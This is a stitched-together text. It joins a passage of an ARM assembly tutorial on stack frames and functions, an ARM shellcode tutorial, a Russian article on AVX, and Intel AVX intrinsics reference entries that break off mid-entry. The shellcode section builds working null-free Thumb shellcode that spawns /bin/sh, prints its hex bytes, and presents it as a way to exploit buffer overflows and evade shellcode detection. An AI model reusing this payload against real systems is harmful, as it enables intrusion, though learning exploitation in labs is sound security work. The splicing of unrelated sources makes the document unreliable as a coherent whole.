     int a = 1;
     int b = 2;
     res = max(a, b);
     return res;
    }
    
    int max(int a,int b)
    {
     do_nothing();
     if(a<b)
     {
     return b;
     }
     else
     {
     return a;
     }
    }
    int do_nothing()
    {
     return 0;
    }

    In the screenshot below we can see a simple illustration of a Stack Frame through the perspective of GDB debugger.

    We can see in the picture above that currently we are about to leave the function max (see the arrow in the disassembly at the bottom). At this state, the FP (R11) points to 0xbefff254 which is the bottom of our Stack Frame. This address on the Stack (green addresses) stores 0x00010418 which is the return address (previous LR). 4 bytes above this (at 0xbefff250) we have a value 0xbefff26c, which is the address of a previous Frame Pointer. The 0x1 and 0x2 at addresses 0xbefff24c and 0xbefff248 are local variables which were used during the execution of the function max. So the Stack Frame which we just analyzed had only LR, FP and two local variables.

    FUNCTIONS

    To understand functions in ARM we first need to get familiar with the structural parts of a function, which are:

    1. Prologue
    2. Body
    3. Epilogue

    The purpose of the prologue is to save the previous state of the program (by storing values of LR and R11 onto the Stack) and set up the Stack for the local variables of the function. While the implementation of the prologue may differ depending on a compiler that was used, generally this is done by using PUSH/ADD/SUB instructions. An example of a prologue would look like this:

    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack. This also allocates space for the Stack Frame */

    The body part of the function is usually responsible for some kind of unique and specific task. This part of the function may contain various instructions, branches (jumps) to other functions, etc. An example of a body section of a function can be as simple as the following few instructions:

    mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the function max */
    mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the function max */
    bl     max          /* Calling/branching to function max */

    The sample code above shows a snippet of a function which sets up local variables and then branches to another function. This piece of code also shows us that the parameters of a function (in this case function max) are passed via registers. In some cases, when there are more than 4 parameters to be passed, we would additionally use the Stack to store the remaining parameters. It is also worth mentioning, that a result of a function is returned via the register R0. So what ever the result of a function (max) turns out to be, we should be able to pick it up from the register R0 right after the return from the function. One more thing to point out is that in certain situations the result might be 64 bits in length (exceeds the size of a 32bit register). In that case we can use R0 combined with R1 to return a 64 bit result.

    The last part of the function, the epilogue, is used to restore the program’s state to it’s initial one (before the function call) so that it can continue from where it left of. For that we need to readjust the Stack Pointer. This is done by using the Frame Pointer register (R11) as a reference and performing add or sub operation. Once we readjust the Stack Pointer, we restore the previously (in prologue) saved register values by poping them from the Stack into respective registers. Depending on the function type, the POP instruction might be the final instruction of the epilogue. However, it might be that after restoring the register values we use BX instruction for leaving the function. An example of an epilogue looks like this:

    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame Pointer from the Stack, jumping to previously saved LR via direct load into PC. The Stack Frame of a function is finally destroyed at this step. */

    So now we know, that:

    1. Prologue sets up the environment for the function;
    2. Body implements the function’s logic and stores result to R0;
    3. Epilogue restores the state so that the program can resume from where it left of before calling the function.

    Another key point to know about the functions is their types: leaf and non-leaf. The leaf function is a kind of a function which does not call/branch to another function from itself. A non-leaf function is a kind of a function which in addition to it’s own logic’s does call/branch to another function. The implementation of these two kind of functions are similar. However, they have some differences. To analyze the differences of these functions we will use the following piece of code:

    /* azeria@labs:~$ as func.s -o func.o && gcc func.o -o func && gdb func */
    .global main
    
    main:
    	push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    	mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    	mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    	bl     max          /* Calling/branching to function max */
    	sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */
    
    max:
    	push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */
    	cmp    r0, r1       /* Implementation of if(a<b) */
    	movlt  r0, r1       /* if r0 was lower than r1, store r1 into r0 */
    	add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11}        /* restoring frame pointer */
    	bx     lr           /* End of the epilogue. Jumping back to main via LR register */

    The example above contains two functions: main, which is a non-leaf function, and max – a leaf function. As mentioned before, the non-leaf function calls/branches to another function, which is true in our case, because we branch to a function max from the function main. The function max in this case does not branch to another function within it’s body part, which makes it a leaf function.

    Another key difference is the way the prologues and epilogues are implemented. The following example shows a comparison of prologues of a non-leaf and leaf functions:

    /* A prologue of a non-leaf function */
    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    
    /* A prologue of a leaf function */
    push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */

    The main difference here is that the entry of the prologue in the non-leaf function saves more register’s onto the stack. The reason behind this is that by the nature of the non-leaf function, the LR gets modified during the execution of such a function and therefore the value of this register needs to be preserved so that it can be restored later. Generally, the prologue could save even more registers if it’s necessary.

    The comparison of the epilogues of the leaf and non-leaf functions, which we see below, shows us that the program’s flow is controlled in different ways: by branching to an address stored in the LR register in the leaf function’s case and by direct POP to PC register in the non-leaf function.

     /* An epilogue of a leaf function */
    add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11}        /* restoring frame pointer */
    bx     lr           /* End of the epilogue. Jumping back to main via LR register */
    
    /* An epilogue of a non-leaf function */
    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

    Finally, it is important to understand the use of BL and BX instructions here. In our example, we branched to a leaf function by using a BL instruction. We use the the label of a function as a parameter to initiate branching. During the compilation process, the label gets replaced with a memory address. Before jumping to that location, the address of the next instruction is saved (linked) to the LR register so that we can return back to where we left off when the function max is finished.

    The BX instruction, which is used to leave the leaf function, takes LR register as a parameter. As mentioned earlier, before jumping to function max the BL instruction saved the address of the next instruction of the function main into the LR register. Due to the fact that the leaf function is not supposed to change the value of the LR register during it’s execution, this register can be now used to return to the parent (main) function. As explained in the previous chapter, the BX instruction  can eXchange between the ARM/Thumb modes during branching operation. In this case, it is done by inspecting the last bit of the LR register: if the bit is set to 1, the CPU will change (or keep) the mode to thumb, if it’s set to 0, the mode will be changed (or kept) to ARM. This is a nice design feature which allows to call functions from different modes.

    To take another perspective into functions and their internals we can examine the following animation which illustrates the inner workings of non-leaf and leaf functions.

FURTHER READING

1. Whirlwind Tour of ARM Assembly.
https://www.coranac.com/tonc/text/asm.htm

2. ARM assembler in Raspberry Pi.
http://thinkingeek.com/arm-assembler-raspberry-pi/

3. Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation by Bruce Dang, Alexandre Gazet, Elias Bachaalany and Sebastien Josse.

4. ARM Reference Manual.
http://infocenter.arm.com/help/topic/com.arm.doc.dui0068b/index.html

5. Assembler User Guide.
http://www.keil.com/support/man/docs/armasm/default.htm

WRITING ARM SHELLCODE

INTRODUCTION TO WRITING ARM SHELLCODE

 

This tutorial is for people who think beyond running automated shellcode generators and want to learn how to write shellcode in ARM assembly themselves. After all, knowing how it works under the hood and having full control over the result is much more fun than simply running a tool, isn’t it? Writing your own shellcode in assembly is a skill that can turn out to be very useful in scenarios where you need to bypass shellcode-detection algorithms or other restrictions where automated tools could turn out to be insufficient. The good news is, it’s a skill that can be learned quite easily once you are familiar with the process.

For this tutorial we will use the following tools (most of them should be installed by default on your Linux distribution):

  • GDB – our debugger of choice
  • GEF –  GDB Enhanced Features, highly recommended (created by @_hugsy_)
  • GCC – Gnu Compiler Collection
  • as – assembler
  • ld – linker
  • strace – utility to trace system calls
  • objdump – to check for null-bytes in the disassembly
  • objcopy – to extract raw shellcode from ELF binary

Make sure you compile and run all the examples in this tutorial in an ARM environment.

Before you start writing your shellcode, make sure you are aware of some basic principles, such as:

  1. You want your shellcode to be compact and free of null-bytes
    • Reason: We are writing shellcode that we will use to exploit memory corruption vulnerabilities like buffer overflows. Some buffer overflows occur because of the use of the C function ‘strcpy’. Its job is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work.
  2. You also want to avoid library calls and absolute memory addresses
    • Reason: To make our shellcode as universal as possible, we can’t rely on library calls that require specific dependencies and absolute memory addresses that depend on specific environments.

The Process of writing shellcode involves the following steps:

  1. Knowing what system calls you want to use
  2. Figuring out the syscall number and the parameters your chosen syscall function requires
  3. De-Nullifying your shellcode
  4. Converting your shellcode into a Hex string
UNDERSTANDING SYSTEM FUNCTIONS

Before diving into our first shellcode, let’s write a simple ARM assembly program that outputs a string. The first step is to look up the system call we want to use, which in this case is “write”. The prototype of this system call can be looked up in the Linux man pages:

ssize_t write(int fd, const void *buf, size_t count);

From the perspective of a high level programming language like C, the invocation of this system call would look like the following:

const char string[13] = "Azeria Labs\n";
write(1, string, sizeof(string));        // Here sizeof(string) is 13

Looking at this prototype, we can see that we need the following parameters:

  • fd – 1 for STDOUT
  • buf – pointer to a string
  • count – number of bytes to write -> 13
  • syscall number of write -> 0x4

For the first 3 parameters we can use R0, R1, and R2. For the syscall we need to use R7 and move the number 0x4 into it.

mov   r0, #1      @ fd 1 = STDOUT
ldr   r1, string  @ loading the string from memory to R1
mov   r2, #13     @ write 13 bytes to STDOUT 
mov   r7, #4      @ Syscall 0x4 = write()
svc   #0

Using the snippet above, a functional ARM assembly program would look like the following:

.data
string: .asciz "Azeria Labs\n"  @ .asciz adds a null-byte to the end of the string
after_string:
.set size_of_string, after_string - string

.text
.global _start

_start:
   mov r0, #1               @ STDOUT
   ldr r1, addr_of_string   @ memory address of string
   mov r2, #size_of_string  @ size of string
   mov r7, #4               @ write syscall
   swi #0                   @ invoke syscall

_exit:
   mov r7, #1               @ exit syscall
   swi 0                    @ invoke syscall

addr_of_string: .word string

In the data section we calculate the size of our string by subtracting the address at the beginning of the string from the address after the string. This, of course, is not necessary if we would just calculate the string size manually and put the result directly into R2. To exit our program we use the system call exit() which has the syscall number 1.

Compile and execute:

azeria@labs:~$ as write.s -o write.o && ld write.o -o write
azeria@labs:~$ ./write
Azeria Labs

Cool. Now that we know the process, let’s look into it in more detail and write our first simple shellcode in ARM assembly.

1. TRACING SYSTEM CALLS

For our first example we will take the following simple function and transform it into ARM assembly:

#include <stdio.h>

void main(void)
{
    system("/bin/sh");
}

The first step is to figure out what system calls this function invokes and what parameters are required by the system call. With ‘strace’ we can monitor our program’s system calls to the Kernel of the OS.

Save the code above in a file and compile it before running the strace command on it.

azeria@labs:~$ gcc system.c -o system
azeria@labs:~$ strace -h
-f -- follow forks, -ff -- with output into separate files
-v -- verbose mode: print unabbreviated argv, stat, termio[s], etc. args
--- snip --
azeria@labs:~$ strace -f -v system
--- snip --
[pid 4575] execve("/bin/sh", ["/bin/sh"], ["MAIL=/var/mail/pi", "SSH_CLIENT=192.168.200.1 42616 2"..., "USER=pi", "SHLVL=1", "OLDPWD=/home/azeria", "HOME=/home/azeria", "XDG_SESSION_COOKIE=34069147acf8a"..., "SSH_TTY=/dev/pts/1", "LOGNAME=pi", "_=/usr/bin/strace", "TERM=xterm", "PATH=/usr/local/sbin:/usr/local/"..., "LANG=en_US.UTF-8", "LS_COLORS=rs=0:di=01;34:ln=01;36"..., "SHELL=/bin/bash", "EGG=AAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "LC_ALL=en_US.UTF-8", "PWD=/home/azeria/", "SSH_CONNECTION=192.168.200.1 426"...]) = 0
--- snip --
[pid 4575] write(2, "$ ", 2$ ) = 2
[pid 4575] read(0, exit
--- snip --
exit_group(0) = ?
+++ exited with 0 +++

Turns out, the system function execve() is being invoked.

2. SYSCALL NUMBER AND PARAMETERS

The next step is to figure out the syscall number of execve() and the parameters this function requires. You can get a nice overview of system calls at w3calls or by searching through Linux man pages. Here’s what we get from the man page of execve():

NAME
    execve - execute program
SYNOPSIS

    #include <unistd.h>

    int  execve(const char *filename, char *const argv [], char *const envp[]);

The parameters execve() requires are:

  • Pointer to a string specifying the path to a binary
  • argv[] – array of command line variables
  • envp[] – array of environment variables

Which basically translates to: execve(*filename, *argv[], *envp[]) –> execve(*filename, 0, 0). The system call number of this function can be looked up with the following command:

azeria@labs:~$ grep execve /usr/include/arm-linux-gnueabihf/asm/unistd.h 
#define __NR_execve (__NR_SYSCALL_BASE+ 11)

Looking at the output you can see that the syscall number of execve() is 11. Register R0 to R2 can be used for the function parameters and register R7 will store the syscall number.

Invoking system calls on x86 works as follows: First, you PUSH parameters on the stack. Then, the syscall number gets moved into EAX (MOV EAX, syscall_number). And lastly, you invoke the system call with SYSENTER / INT 80.

On ARM, syscall invocation works a little bit differently:

  1. Move parameters into registers – R0, R1, ..
  2. Move the syscall number into register R7
    • mov  r7, #<syscall_number>
  3. Invoke the system call with
    • SVC #0 or
    • SVC #1
  4. The return value ends up in R0

This is how it looks like in ARM Assembly (Code uploaded to the azeria-labs Github account):

As you can see in the picture above, we start with pointing R0 to our “/bin/sh” string by using PC-relative addressing (If you can’t remember why the effective PC starts two instructions ahead of the current one, go to ‘‘Data Types and Registers‘ of the assembly basics tutorial and look at part where the PC register is explained along with an example). Then we move 0’s into R1 and R2 and move the syscall number 11 into R7. Looks easy, right? Let’s look at the disassembly of our first attempt using objdump:

azeria@labs:~$ as execve1.s -o execve1.o
azeria@labs:~$ objdump -d execve1.o
execve1.o: file format elf32-littlearm

Disassembly of section .text:

00000000 <_start>:
 0: e28f000c add r0, pc, #12
 4: e3a01000 mov r1, #0
 8: e3a02000 mov r2, #0
 c: e3a0700b mov r7, #11
 10: ef000000 svc 0x00000000
 14: 6e69622f .word 0x6e69622f
 18: 0068732f .word 0x0068732f

Turns out we have quite a lot of null-bytes in our shellcode. The next step is to de-nullify the shellcode and replace all operations that involve.

3. DE-NULLIFYING SHELLCODE

One of the techniques we can use to make null-bytes less likely to appear in our shellcode is to use Thumb mode. Using Thumb mode decreases the chances of having null-bytes, because Thumb instructions are 2 bytes long instead of 4. If you went through the ARM Assembly Basics tutorials you know how to switch from ARM to Thumb mode. If you haven’t I encourage you to read the chapter about the branching instructions “B / BX / BLX” in part 6 of the tutorial “Conditional Execution and Branching“.

In our second attempt we use Thumb mode and replace the operations containing #0’s with operations that result in 0’s by subtracting registers from each other or xor’ing them. For example, instead of using “mov  r1, #0”, use either “sub  r1, r1, r1” (r1 = r1 – r1) or “eor  r1, r1, r1” (r1 = r1 xor r1). Keep in mind that since we are now using Thumb mode (2 byte instructions) and our code must be 4 byte aligned, we need to add a NOP at the end (e.g. mov  r5, r5).

(Code available on the azeria-labs Github account):

The disassembled code looks like the following:

The result is that we only have one single null-byte that we need to get rid of. The part of our code that’s causing the null-byte is the null-terminated string “/bin/sh\0”. We can solve this issue with the following technique:

  • Replace “/bin/sh\0” with “/bin/shX”
  • Use the instruction strb (store byte) in combination with an existing zero-filled register to replace X with a null-byte

(Code available on the azeria-labs Github account):

Voilà – no null-bytes!

4. TRANSFORM SHELLCODE INTO HEX STRING

The shellcode we created can now be transformed into it’s hexadecimal representation. Before doing that, it is a good idea to check if the shellcode works as a standalone. But there’s a problem: if we compile our assembly file like we would normally do, it won’t work. The reason for this is that we use the strb operation to modify our code section (.text). This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

azeria@labs:~$ ld --help
--- snip --
-N, --omagic        Do not page align data, do not make text readonly.
--- snip -- 
azeria@labs:~$ as execve3.s -o execve3.o && ld -N execve3.o -o execve3
azeria@labs:~$ ./execve3
$ whoami
azeria

It works! Congratulations, you’ve written your first shellcode in ARM assembly.

To convert it into hex, use the following commands:

azeria@labs:~$ objcopy -O binary execve3 execve3.bin 
azeria@labs:~$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve3.bin 
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

Instead of using the hexdump command above, you also do the same with a simple python script:

#!/usr/bin/env python

import sys

binary = open(sys.argv[1],'rb')

for byte in binary.read():
 sys.stdout.write("\\x"+byte.encode("hex"))

print ""
azeria@labs:~$ ./shellcode.py execve3.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

I hope you enjoyed this introduction into writing ARM shellcode. In the next part you will learn how to write shellcode in form of a reverse-shell, which is a little bit more complicated than the example above. After that we will dive into memory corruptions and learn how they occur and how to exploit them using our self-made shellcode.

AVX — Advanced Vector Extensions are extensions to the x86 instruction set architecture for microprocessors from Intel and AMD

Advanced Vector Extensions (AVX) — расширение системы команд x86 для микропроцессоров Intel и AMD.

AVX предоставляет различные улучшения, новые инструкции и новую схему кодирования машинных кодов.

Улучшения

  • Новая схема кодирования инструкций VEX
  • Ширина векторных регистров SIMD увеличивается со 128 (XMM) до 256 бит (регистры YMM0 — YMM15). Существующие 128-битные SSE-инструкции будут использовать младшую половину новых YMM регистров, не изменяя старшую часть. Для работы с YMM-регистрами добавлены новые 256-битные AVX-инструкции. В будущем возможно расширение векторных регистров SIMD до 512 или 1024 бит. Например, процессоры с архитектурой Xeon Phi уже в 2012 году имели векторные регистры (ZMM) шириной в 512 бит, и используют для работы с ними SIMD-команды с MVEX- и VEX-префиксами, но при этом они не поддерживают AVX.
  • Неразрушающие операции. Набор AVX-инструкций использует трёхоперандный синтаксис. Например, вместо {\displaystyle a=a+b}a=a+b можно использовать {\displaystyle c=a+b}c=a+b, при этом регистр {\displaystyle a}a остаётся неизменённым. В случаях, когда значение {\displaystyle a}a используется дальше в вычислениях, это повышает производительность, так как избавляет от необходимости сохранять перед вычислением и восстанавливать после вычисления регистр, содержавший {\displaystyle a}a, из другого регистра или памяти.
  • Для большинства новых инструкций отсутствуют требования к выравниванию операндов в памяти. Однако рекомендуется следить за выравниванием на размер операнда, во избежание значительного снижения производительности.
  • Набор инструкций AVX содержит в себе аналоги 128-битных SSE инструкций для вещественных чисел. При этом, в отличие от оригиналов, сохранение 128-битного результата будет обнулять старшую половину YMM регистра. 128-битные AVX-инструкции сохраняют прочие преимущества AVX, такие, как новая схема кодирования, трехоперандный синтаксис и невыровненный доступ к памяти.
  • Intel рекомендует отказаться от старых SSE инструкций в пользу новых 128-битных AVX-инструкций, даже если достаточно двух операндов.

Новая схема кодирования

Новая схема кодирования инструкций VEX использует VEX-префикс. В настоящий момент существуют два VEX-префикса, длиной 2 и 3 байта. Для 2-хбайтного VEX-префикса первый байт равен 0xC5, для 3-х байтного — 0xC4.

В 64-битном режиме первый байт VEX-префикса уникален. В 32-битном режиме возникает конфликт с инструкциями LES и LDS, который разрешается старшим битом второго байта, он имеет значение только в 64-битном режиме, через неподдерживаемые формы инструкций LES и LDS.

Длина существующих AVX-инструкций, вместе с VEX-префиксом, не превышает 11 байт. В следующих версиях ожидается появление более длинных инструкций.

Новые инструкции

Инструкция Описание
VBROADCASTSS, VBROADCASTSD, VBROADCASTF128 Копирует 32-х-, 64-х- или 128-битный операнд из памяти во все элементы векторного регистра XMM или YMM.
VINSERTF128 Замещает младшую или старшую половину 256-битного регистра YMM значением 128-битного операнда. Другая часть регистра-получателя не изменяется.
VEXTRACTF128 Извлекает младшую или старшую половину 256-битного регистра YMM и копирует в 128-битный операнд-назначение.
VMASKMOVPS, VMASKMOVPD Условно считывает любое количество элементов из векторного операнда из памяти в регистр-получатель, оставляя остальные элементы несчитанными и обнуляя соответствующие им элементы регистра-получателя. Также может условно записывать любое количество элементов из векторного регистра в векторный операнд в памяти, оставляя остальные элементы операнда памяти неизменёнными.
VPERMILPS, VPERMILPD Переставляет 32-х или 64-х битные элементы вектора согласно операнду-селектору (из памяти или из регистра).
VPERM2F128 Переставляет 4 128-битных элемента двух 256-битных регистров в 256-битный операнд-назначение с использованием непосредственной константы (imm) в качестве селектора.
VZEROALL Обнуляет все YMM-регистры и помечает их как неиспользуемые. Используется при переключении между 128-битным режимом и 256-битным.
VZEROUPPER Обнуляет старшие половины всех регистров YMM. Используется при переключении между 128-битным режимом и 256-битным.

Также в спецификации AVX описана группа инструкций PCLMUL (Parallel Carry-Less Multiplication, Parallel CLMUL)

  • PCLMULLQLQDQ xmmreg, xmmrm [rm: 66 0f 3a 44 /r 00]
  • PCLMULHQLQDQ xmmreg, xmmrm [rm: 66 0f 3a 44 /r 01]
  • PCLMULLQHQDQ xmmreg, xmmrm [rm: 66 0f 3a 44 /r 02]
  • PCLMULHQHQDQ xmmreg, xmmrm [rm: 66 0f 3a 44 /r 03]
  • PCLMULQDQ xmmreg, xmmrm, imm [rmi: 66 0f 3a 44 /r ib]

Применение

Подходит для интенсивных вычислений с плавающей точкой в мультимедиа-программах и научных задачах. Там, где возможна более высокая степень параллелизма, увеличивает производительность с вещественными числами.

Инструкции и примеры

__m256i _mm256_abs_epi16 (__m256i a)

Synopsis

__m256i _mm256_abs_epi16 (__m256i a)
#include «immintrin.h»
Instruction: vpabsw ymm, ymm
CPUID Flags: AVX2

Description

Compute the absolute value of packed 16-bit integers in a, and store the unsigned results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := ABS(a[i+15:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpabsd
__m256i _mm256_abs_epi32 (__m256i a)

Synopsis

__m256i _mm256_abs_epi32 (__m256i a)
#include «immintrin.h»
Instruction: vpabsd ymm, ymm
CPUID Flags: AVX2

Description

Compute the absolute value of packed 32-bit integers in a, and store the unsigned results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ABS(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpabsb
__m256i _mm256_abs_epi8 (__m256i a)

Synopsis

__m256i _mm256_abs_epi8 (__m256i a)
#include «immintrin.h»
Instruction: vpabsb ymm, ymm
CPUID Flags: AVX2

Description

Compute the absolute value of packed 8-bit integers in a, and store the unsigned results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := ABS(a[i+7:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpaddw
__m256i _mm256_add_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_add_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpaddw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 16-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := a[i+15:i] + b[i+15:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpaddd
__m256i _mm256_add_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_add_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpaddd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 32-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] + b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpaddq
__m256i _mm256_add_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_add_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpaddq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 64-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] + b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpaddb
__m256i _mm256_add_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_add_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpaddb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 8-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := a[i+7:i] + b[i+7:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vaddpd
__m256d _mm256_add_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_add_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vaddpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Add packed double-precision (64-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] + b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vaddps
__m256 _mm256_add_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_add_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vaddps ymm, ymm, ymm
CPUID Flags: AVX

Description

Add packed single-precision (32-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] + b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vpaddsw
__m256i _mm256_adds_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_adds_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpaddsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 16-bit integers in a and b using saturation, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := Saturate_To_Int16( a[i+15:i] + b[i+15:i] ) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpaddsb
__m256i _mm256_adds_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_adds_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpaddsb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 8-bit integers in a and b using saturation, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := Saturate_To_Int8( a[i+7:i] + b[i+7:i] ) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpaddusw
__m256i _mm256_adds_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_adds_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpaddusw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed unsigned 16-bit integers in a and b using saturation, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := Saturate_To_UnsignedInt16( a[i+15:i] + b[i+15:i] ) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpaddusb
__m256i _mm256_adds_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_adds_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpaddusb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed unsigned 8-bit integers in a and b using saturation, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := Saturate_To_UnsignedInt8( a[i+7:i] + b[i+7:i] ) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vaddsubpd
__m256d _mm256_addsub_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_addsub_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vaddsubpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Alternatively add and subtract packed double-precision (64-bit) floating-point elements in a to/from packed elements in b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF (j is even) dst[i+63:i] := a[i+63:i] — b[i+63:i] ELSE dst[i+63:i] := a[i+63:i] + b[i+63:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vaddsubps
__m256 _mm256_addsub_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_addsub_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vaddsubps ymm, ymm, ymm
CPUID Flags: AVX

Description

Alternatively add and subtract packed single-precision (32-bit) floating-point elements in a to/from packed elements in b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF (j is even) dst[i+31:i] := a[i+31:i] — b[i+31:i] ELSE dst[i+31:i] := a[i+31:i] + b[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vpalignr
__m256i _mm256_alignr_epi8 (__m256i a, __m256i b, const int count)

Synopsis

__m256i _mm256_alignr_epi8 (__m256i a, __m256i b, const int count)
#include «immintrin.h»
Instruction: vpalignr ymm, ymm, ymm, imm
CPUID Flags: AVX2

Description

Concatenate pairs of 16-byte blocks in a and b into a 32-byte temporary result, shift the result right by count bytes, and store the low 16 bytes in dst.

Operation

